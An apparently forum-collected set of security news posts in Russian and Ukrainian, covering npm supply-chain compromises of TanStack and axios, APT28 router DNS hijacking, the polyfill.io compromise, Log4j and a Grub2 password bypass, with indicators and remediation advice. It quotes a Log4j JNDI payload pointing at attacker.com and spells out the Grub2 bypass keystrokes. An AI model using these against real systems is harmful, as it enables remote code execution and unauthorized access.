Взломали github, который принадлежит microsoft. Через сотрудника microsoft, который пользовался vscode от microsoft. В который было установлено вредоносное расширение из магазина, который контролирует microsoft.

Та от знову

Вчора розробники TanStack повідомили, що невідомі зловмисники здійснили атаку на ланцюг постачання та скомпрометували одразу 42 пакети екосистеми, випустивши 84 шкідливі версії.

Дослідники виявили, що зловмисники не зламували особисті акаунти розробників, а використали ланцюжок вразливостей в архітектурі GitHub Actions, щоб безпосередньо опублікувати заражені версії прямо в реєстр npm.

Якщо ви встановлювали будь-які пакети з родини @tanstack/* вчора (зверніть увагу, що пакети query, table, form, virtual та store підтверджено залишилися чистими), вам потрібно перевіритися.

Будь-який хост або CI-сервер, де відбулося встановлення в цей день, апріорі вважається скомпрометованим. Вам необхідно замінити всі локальні ключі, SSH-сертифікати, хмарні токени та доступи до баз даних, які можна було дістати з вашого пристрою.

https://dou.ua/forums/topic/59443/

За 18 годин до атаки хтось із поштою nrwise@proton.me публікує пакет plain-crypto-js@4.2.0. Це була копія легітимної бібліотеки crypto-js.

30 березня 2026 року о 23:59 UTC публікується шкідлива версія plain-crypto-js@4.2.1. Автором вказано jasonsaayman.

У найближчі 39 хвилин хакери публікують axios@1.14.1 та axios@0.30.4, єдина зміна в яких — це додавання цієї шкідливої залежності.

Будь-який проєкт, у якому стояли не суворі залежності (наприклад, ^1.14.0 або ^0.30.0), автоматично підтягнув би вірус при наступному npm install.

Якщо ви використовуєте Axios, про всяк випадок, перевірте свої проєкти.

Шукайте у своїх залежностях та lock-файлах:
axios@1.14.1
axios@0.30.4
plain-crypto-js@4.2.1

Простого видалення зараженого пакета не буде достатньо. Якщо шкідливий скрипт встиг виконатися, то вам необхідно вважати всі локальні ключі, сертифікати та доступи скомпрометованими і відкликати їх та перевипустити.

https://dou.ua/forums/topic/58693/

Российская кибергруппировка APT28 использует уязвимости маршрутизаторов для перехвата DNS, что позволяет осуществлять атаки типа «злоумышленник посередине» и красть пароли и токены аутентификации.

Список моделей с уязвимостями
TP-LINK LTE WIRELESS N ROUTER MR6400
TP-LINK WIRELESS DUAL BAND GIGABIT ROUTER ARCHER C5
TP-LINK WIRELESS DUAL BAND GIGABIT ROUTER ARCHER C7
TP-LINK WIRELESS DUAL BAND GIGABIT ROUTER WDR3600
TP-LINK WIRELESS DUAL BAND GIGABIT ROUTER WDR4300
TP-LINK WIRELESS DUAL BAND ROUTER WDR3500
TP-LINK WIRELESS LITE N ROUTER WR740N
TP-LINK WIRELESS LITE N ROUTER WR740N/WR741ND
TP-LINK WIRELESS LITE N ROUTER WR749N
TP-LINK WIRELESS N 3G/4G ROUTER MR3420
TP-LINK WIRELESS N ACCESS POINT WA801ND
TP-LINK WIRELESS N ACCESS POINT WA901ND
TP-LINK WIRELESS N GIGABIT ROUTER WR1043ND
TP-LINK WIRELESS N GIGABIT ROUTER WR1045ND
TP-LINK WIRELESS N ROUTER WR840N
TP-LINK WIRELESS N ROUTER WR841HP
TP-LINK WIRELESS N ROUTER WR841N
TP-LINK WIRELESS N ROUTER WR841N/WR841ND
TP-LINK WIRELESS N ROUTER WR842N
TP-LINK WIRELESS N ROUTER WR842ND
TP-LINK WIRELESS N ROUTER WR845N
TP-LINK WIRELESS N ROUTER WR941ND
TP-LINK WIRELESS N ROUTER WR945N

Кто-то удивлён что это TP-Link?

https://www.ncsc.gov.uk/new...hijacking-operations

Какую-то уязвимость нашли в телеге, с возможностью удалённого выполнения кода.
Какие платформы подвержены неизвестно.
https://www.zerodayinitiati...advisories/upcoming/

Домены cdn[.]polyfill[.]io и bootcss[.]com скомпрометированы, заразив вредоносным кодом более 110 000 веб-сайтов
Изменение произошло после того, как подозреваемая китайская фирма приобрела домен в начале 2024 года.

На сайте предлагались широко используемые фрагменты кода для старых браузеров, которые позволяли использовать современные функции Javascript.

Вредоносное ПО распространяется через домен с февраля 2024 года.

Вредоносный код генерирует полезные нагрузки, которые различаются в зависимости от заголовков HTTP, что обеспечивает большую степень обфускации за счет активации только на определенных устройствах, задержки выполнения и обхода пользователей-администраторов, что позволяет избежать обнаружения.

Также было замечено, что Google блокирует рекламу Google Ads на веб-сайтах, использующих зараженный код, предположительно для уменьшения количества жертв. Технический гигант также разослал предупреждения владельцам сайтов. Владельцы сайтов должны как можно скорее принять меры для снижения рисков для себя и своих пользователей.

https://www.spiceworks.com/...ck-infects-websites/

Никогда такого не было и вот опять

Владельцы сайтов должны как можно скорее принять меры для снижения рисков для себя и своих пользователей.

Наконец-то начать загружать библиотеки со своего сервера.

Уязвимость в Apache Log4j, затрагивающая многие Java-проекты
https://www.opennet.ru/open.../art.shtml?num=56319

проблеме подвержены почти все проекты, использующие такие фреймворки, как Apache Struts, Apache Solr, Apache Druid или Apache Flink, включая Steam, Apple iCloud, клиенты и серверы игры Minecraft.

Проблема была вызвана тем, что log4j поддерживает обработку специальных масок "{}" в выводимых в лог строках, в которых могли выполняться запросы JNDI (Java Naming and Directory Interface). Атака сводится к передаче строки с подстановкой "${jndi:ldap://attacker.com/a}", при обработке которой log4j отправит на сервер attacker.com LDAP-запрос пути к Java-классу. Возвращённый сервером атакующего путь (например, http://second-stage.attacker.com/Exploit.class) будет загружен и выполнен в контексте текущего процесса, что позволяет атакующему добиться выполнения произвольного кода в системе с правами текущего приложения.

Эксплоит
https://github.com/tangxiaofeng7/apache-log4j-poc

--
Вот эту фичу с загрузкой классов и их выполнению всегда считал какой-то java-дичью.

в загрузчике Grub2 обнаружена уязвимость, позволяющая обходить защиту паролем, и дающая полный доступ к шеллу.
Эксплоит: вместо введения пароля нажать на Backspace ровно 28 раз, а потом Enter
Если вместо ввода пароля нажимать на Backspace, то из-за пропущенной проверки программа заезжает за пределы буфера и начинает затирать нулями память с отрицательным смещением.

http://malaya-zemlya.livejournal.com/757068.html
http://hmarco.org/bugs/CVE-...tication-bypass.html